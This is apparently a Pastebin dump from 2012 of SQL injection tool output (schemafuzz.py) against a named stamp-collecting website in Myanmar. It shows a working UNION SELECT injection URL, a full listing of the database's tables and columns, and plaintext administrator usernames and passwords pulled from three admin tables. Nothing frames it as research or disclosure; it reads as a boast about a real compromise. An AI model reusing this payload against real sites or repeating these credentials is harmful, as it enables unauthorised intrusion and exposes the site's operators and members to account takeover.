Advertisement
bl4ck4ng3l

myanmar fvcking web

Aug 10th, 2012
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.64 KB | None | 0 0
  1. [+] URL:http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
  2. [+] Evasion Used: "+" "--"
  3. [+] 12:19:06
  4. [+] Proxy Not Given
  5. [+] Gathering MySQL Server Configuration...
  6. Database: stampsmyanmar
  7. Version: 5.1.30-community
  8. [+] Showing Tables & Columns from database "stampsmyanmar"
  9. [+] Number of Tables: 46
  10.  
  11. [Database]: stampsmyanmar
  12. [Table: Columns]
  13. [0]special_sale: sale_id,sale_title,sale_description,sale_year,sale_price,sale_forhome
  14. [1]stmyr_admin: admin_username,admin_password,admin_level
  15. [2]stmyr_article: id,title,snote,detail,date,author,artref,formediahome
  16. [3]stmyr_coi: coi_id,coi_countrycode,coi_membercode,coi_materialcode,coi_imgcode,coi_title,coi_description,coi_price,coi_year,coi_yearrangecode,coi_continentcode,coi_quantity,coi_forhome,coi_newarrivalforhome,coi_condition,coi_status,coi_mainthemes,coi_subthemes,coi_fullimgcode
  17. [4]stmyr_continents: continents_code,continents_name
  18. [5]stmyr_country: country_id,country_name,country_code,continent_code,country_img
  19. [6]stmyr_cov: cov_id,cov_countrycode,cov_membercode,cov_materialcode,cov_imgcode,cov_title,cov_description,cov_price,cov_year,cov_yearrangecode,cov_continentcode,cov_quantity,cov_forcollectionhome,cov_newarrivalforhome,cov_homecollection,cov_newarrivalforcollection,cov_condition,cov_status,cov_mainthemes,cov_subthemes,cov_fullimgcode
  20. [7]stmyr_cto: cto_id,cto_countrycode,cto_membercode,cto_materialcode,cto_imgcode,cto_title,cto_description,cto_price,cto_year,cto_yearrangecode,cto_continentcode,cto_quantity,cto_forcollectionhome,cto_newarrivalforhome,cto_homecollection,cto_newarrivalforcollection,cto_condition,cto_status,cto_mainthemes,cto_subthemes
  21. [8]stmyr_election: election_id,election_img,election_title
  22. [9]stmyr_env: env_id,env_countrycode,env_membercode,env_materialcode,env_imgcode,env_title,env_description,env_price,env_year,env_yearrangecode,env_continentcode,env_quantity,env_forcollectionhome,env_newarrivalforhome,env_homecollection,env_newarrivalforcollection,env_condition,env_status,env_mainthemes,env_subthemes
  23. [10]stmyr_exhibition: exhibition_id,exhibition_img,exhibition_title
  24. [11]stmyr_exhibition_admin: ex_admin_username,ex_admin_password
  25. [12]stmyr_exhibitor: exhibitor_id,exhibitor_name,exhibitor_title,exhibitor_bio,exhibitor_address,exhibitor_email,exhibitor_phone,exhibitor_foldername,exhibitor_gender,exhibitor_img
  26. [13]stmyr_exhibitor_pic: expic_id,expic_exhibitor_id,expic_picname,expic_countid
  27. [14]stmyr_fanclub: fc_id,fc_first_name,fc_last_name,fc_nick_name,fc_address,fc_street,fc_city,fc_state,fc_country,fc_postalcode,fc_phonecode,fc_phone,fc_fax,fc_username,fc_password,fc_email,fc_isshow,fc_gender,fc_date,fc_month,fc_year,fc_ethnicity,fc_actcode,fc_isactivate,fc_photo,fc_last_login,fc_access_ip,fc_created_date,fc_created_ip,fc_bio,fc_activities,fc_interests,fc_music,fc_books,fc_movies,fc_television,fc_highschool,fc_college_uni,fc_jobtitle,fc_gtalk,fc_aim,fc_skype,fc_yahoo,fc_isshowaddress
  28. [15]stmyr_fc_admin: fcadmin_username,fcadmin_password,fcadmin_nickname
  29. [16]stmyr_fdc: fdc_id,fdc_countrycode,fdc_membercode,fdc_materialcode,fdc_imgcode,fdc_title,fdc_description,fdc_price,fdc_year,fdc_yearrangecode,fdc_continentcode,fdc_quantity,fdc_forhome,fdc_forfdchome,fdc_forcollectionhome,fdc_newarrivalforfdchome,fdc_newarrivalforfdc,fdc_newarrivalforhome,fdc_homecollection,fdc_newarrivalforcollection,fdc_condition,fdc_status,fdc_mainthemes,fdc_subthemes,fdc_fullimgcode
  30. [17]stmyr_fly: fly_id,fly_countrycode,fly_membercode,fly_materialcode,fly_imgcode,fly_title,fly_description,fly_price,fly_year,fly_yearrangecode,fly_continentcode,fly_quantity,fly_forcollectionhome,fly_newarrivalforhome,fly_homecollection,fly_newarrivalforcollection,fly_condition,fly_status,fly_mainthemes,fly_subthemes
  31. [18]stmyr_homeforexhibition: hex_id,hex_title,hex_details,hex_show
  32. [19]stmyr_internationalstampissues: intissues_id,intissues_imgcode,intissues_title,intissues_description,intissues_note,intissues_price,intissues_country,intissues_issuedate,intissues_display,intissues_formediahome
  33. [20]stmyr_journey: journey_id,journey_img,journey_title
  34. [21]stmyr_kevin_journey: journey_id,journey_img,journey_title
  35. [22]stmyr_login: login_username,login_password
  36. [23]stmyr_ltr: ltr_id,ltr_countrycode,ltr_membercode,ltr_materialcode,ltr_imgcode,ltr_title,ltr_description,ltr_price,ltr_year,ltr_yearrangecode,ltr_continentcode,ltr_quantity,ltr_forhome,ltr_type,ltr_forltrhome,ltr_newarrivalforltr,ltr_newarrivalforltrhome,ltr_newarrivalforhome,ltr_newarrivalforcollection,ltr_condition,ltr_status,ltr_mainthemes,ltr_subthemes
  37. [24]stmyr_ltrtype: ltrtype_id,ltrtype_name
  38. [25]stmyr_mainthemes: mthemes_id,mthemes_name,mthemes_display
  39. [26]stmyr_marketplace: mp_id,mp_person,mp_images,mp_title,mp_description,mp_country,mp_price,mp_display,mp_upload_datetime
  40. [27]stmyr_materialtype: material_id,material_name,material_code
  41. [28]stmyr_member: member_id,member_name,member_nickname,member_address,member_country,member_email,member_telno,member_faxno,member_postalcode,member_createddate,member_foldername
  42. [29]stmyr_mp_comment: mp_comment_id,mp_mp_id,mp_comment_person,mp_comment_data,mp_comment_datetime
  43. [30]stmyr_newsletters: nlid,nltitle,nlnote,place,date,month,year,nimg,new_type,short_note,forhome,noteforhome
  44. [31]stmyr_ozone: ozone_id,ozone_img,ozone_title
  45. [32]stmyr_pcd: pcd_id,pcd_countrycode,pcd_membercode,pcd_materialcode,pcd_imgcode,pcd_title,pcd_description,pcd_price,pcd_year,pcd_yearrangecode,pcd_continentcode,pcd_quantity,pcd_type,pcd_sdcode,pcd_forhome,pcd_forpcdhome,pcd_forcollectionhome,pcd_newarrivalforpcd,pcd_newarrivalforpcdhome,pcd_newarrivalforhome,pcd_homecollection,pcd_newarrivalforcollection,pcd_condition,pcd_status,pcd_mainthemes,pcd_subthemes,pcd_fullimgcode
  46. [33]stmyr_pcdtype: pcdtype_id,pcdtype_name
  47. [34]stmyr_post: post_id,post_person,post_data,post_date_time
  48. [35]stmyr_profile_post: post_profile_id,post_profile_person,post_profile_data,post_profile_datetime,post_profile_fan_id,post_fc_id
  49. [36]stmyr_reg: reg_id,reg_countrycode,reg_membercode,reg_materialcode,reg_imgcode,reg_title,reg_description,reg_price,reg_year,reg_yearrangecode,reg_continentcode,reg_quantity,reg_forcollectionhome,reg_newarrivalforhome,reg_homecollection,reg_newarrivalforcollection,reg_condition,reg_status,reg_mainthemes,reg_subthemes
  50. [37]stmyr_reply_post: reply_id,reply_post_id,reply_person,reply_data,reply_date_time
  51. [38]stmyr_reply_profile_post: reply_profile_id,reply_profile_post_id,reply_profile_person,reply_profile_data,reply_profile_datetime,reply_profile_fan_id
  52. [39]stmyr_stampoftheweek: sotw_id,sotw_code,sotw_name,sotw_issuedate,sotw_country,sotw_description,sotw_forhome,sotw_postmonth,sotw_postyear
  53. [40]stmyr_statedivision: sd_code,sd_name
  54. [41]stmyr_stm: stm_id,stm_countrycode,stm_membercode,stm_materialcode,stm_imgcode,stm_title,stm_description,stm_price,stm_year,stm_yearrangecode,stm_continentcode,stm_quantity,stm_sgno,stm_myanmarissue,stm_issueformediahome,stm_formmstamphome,stm_newarrivalformmstamp,stm_newarrivalformmstamphome,stm_forcollectionhome,stm_forhome,stm_mainthemes,stm_subthemes,stm_countryshow,stm_newarrivalforhome,stm_forasean,stm_formm,stm_homecollection,stm_newarrivalforcollection,stm_condition,stm_status,stm_scno,stm_specialcode,stm_fullimgcode
  55. [42]stmyr_tusm: tusm_id,tusm_countrycode,tusm_membercode,tusm_materialcode,tusm_imgcode,tusm_receiveddate,tusm_note,tusm_forhome,tusm_fortusmhome,tusm_gotocollections,tusm_attach
  56. [43]stmyr_tusm_foru: foru_id,foru_countrycode,foru_membercode,foru_materialcode,foru_imgcode,foru_returneddate,foru_note,foru_foruhome,foru_attached,foru_excel,foru_noclaim,foru_register
  57. [44]stmyr_wantlist: wantlist_id,wantlist_fanid,wantlist_countrycode,wantlist_membercode,wantlist_materialcode,wantlist_imgcode,wantlist_date,wantlist_note,wantlist_display,wantlist_exchangepic,wantlist_nickname
  58. [45]stmyr_yearrange: yearrange_id,yearrange_name
  59.  
  60. [-] [12:42:44]
  61. [-] Total URL Requests 463
  62. [-] Done
  63.  
  64. |---------------------------------------------------------------|
  65. | rsauron[@]gmail[dot]com v5.0 |
  66. | 6/2008 schemafuzz.py |
  67. | -MySQL v5+ Information_schema Database Enumeration |
  68. | -MySQL v4+ Data Extractor |
  69. | -MySQL v4+ Table & Column Fuzzer |
  70. | Usage: schemafuzz.py [options] |
  71. | -h help darkc0de.com |
  72. |---------------------------------------------------------------|
  73.  
  74. [+] URL:http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
  75. [+] Evasion Used: "+" "--"
  76. [+] 13:23:43
  77. [+] Proxy Not Given
  78. [+] Gathering MySQL Server Configuration...
  79. Database: stampsmyanmar
  80. Version: 5.1.30-community
  81. [+] Dumping data from database "stampsmyanmar" Table "stmyr_admin"
  82. [+] Column(s) ['admin_username', 'admin_password']
  83. [+] Number of Rows: 10
  84.  
  85. [0] stmadministrator:cms@2012:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 0,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  86.  
  87. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:stmadministrator:cms@2012:
  88. [1] username4cover:Pass4cover:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 1,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  89.  
  90. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4cover:Pass4cover:
  91. [2] username4fdc:Pass4fdc:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 2,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  92.  
  93. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4fdc:Pass4fdc:
  94. [3] username4ltr:Pass4ltr:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 3,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  95.  
  96. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4ltr:Pass4ltr:
  97. [4] username4media:Pass4media:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 4,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  98.  
  99. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4media:Pass4media:
  100. [5] username4pcd:Pass4pcd:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 5,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  101.  
  102. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4pcd:Pass4pcd:
  103. [6] username4postal:Pass4postal:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 6,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  104.  
  105. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4postal:Pass4postal:
  106. [7] username4sotw:Pass4sotw:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 7,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  107.  
  108. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4sotw:Pass4sotw:
  109. [8] username4stamp:Pass4stm:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 8,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  110.  
  111. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4stamp:Pass4stm:
  112. [9] username4tusm:Pass4tusm:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,admin_username,0x1e,admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_admin LIMIT 9,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  113.  
  114. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:username4tusm:Pass4tusm:Pass4tusm:
  115.  
  116. [-] [13:25:14]
  117. [-] Total URL Requests 12
  118. [-] Done
  119.  
  120. |---------------------------------------------------------------|
  121. | rsauron[@]gmail[dot]com v5.0 |
  122. | 6/2008 schemafuzz.py |
  123. | -MySQL v5+ Information_schema Database Enumeration |
  124. | -MySQL v4+ Data Extractor |
  125. | -MySQL v4+ Table & Column Fuzzer |
  126. | Usage: schemafuzz.py [options] |
  127. | -h help darkc0de.com |
  128. |---------------------------------------------------------------|
  129.  
  130. [+] URL:http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
  131. [+] Evasion Used: "+" "--"
  132. [+] 13:36:17
  133. [+] Proxy Not Given
  134. [+] Gathering MySQL Server Configuration...
  135. Database: stampsmyanmar
  136. Version: 5.1.30-community
  137. [+] Dumping data from database "stampsmyanmar" Table "stmyr_exhibition_admin"
  138. [+] Column(s) ['ex_admin_username', 'ex_admin_password']
  139. [+] Number of Rows: 1
  140.  
  141. [0] ex@dmin:exmltst@mp:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,ex_admin_username,0x1e,ex_admin_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_exhibition_admin LIMIT 0,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  142.  
  143. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:ex@dmin:exmltst@mp:exmltst@mp:
  144.  
  145. [-] [13:36:27]
  146. [-] Total URL Requests 3
  147. [-] Done
  148.  
  149. |---------------------------------------------------------------|
  150. | rsauron[@]gmail[dot]com v5.0 |
  151. | 6/2008 schemafuzz.py |
  152. | -MySQL v5+ Information_schema Database Enumeration |
  153. | -MySQL v4+ Data Extractor |
  154. | -MySQL v4+ Table & Column Fuzzer |
  155. | Usage: schemafuzz.py [options] |
  156. | -h help darkc0de.com |
  157. |---------------------------------------------------------------|
  158.  
  159. [+] URL:http://www.stampsmyanmar.com/MYANMAR_STAMPS/detailview.php?yid=10+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
  160. [+] Evasion Used: "+" "--"
  161. [+] 13:37:20
  162. [+] Proxy Not Given
  163. [+] Gathering MySQL Server Configuration...
  164. Database: stampsmyanmar
  165. Version: 5.1.30-community
  166. [+] Dumping data from database "stampsmyanmar" Table "stmyr_login"
  167. [+] Column(s) ['login_username', 'login_password']
  168. [+] Number of Rows: 1
  169.  
  170. [0] linlex:linlex@dmin:NoDataInColumn: &yid=10 AND 1=2 UNION SELECT concat(0x1e,0x1e,login_username,0x1e,login_password,0x1e,0x1e,0x20),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 FROM stampsmyanmar.stmyr_login LIMIT 0,1--"><img src="../COLLCETIONS/stamps/images/small/1_2_3_4.jpg" align="center" border="0" title="5" /></a></td></tr>
  171.  
  172. <tr><td height="10" align="center" class="year_range" ><a href="?page=1&pid=:NoDataInColumn:linlex:linlex@dmin:linlex@dmin:
  173.  
  174. [-] [13:37:33]
  175. [-] Total URL Requests 3
  176. [-] Done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement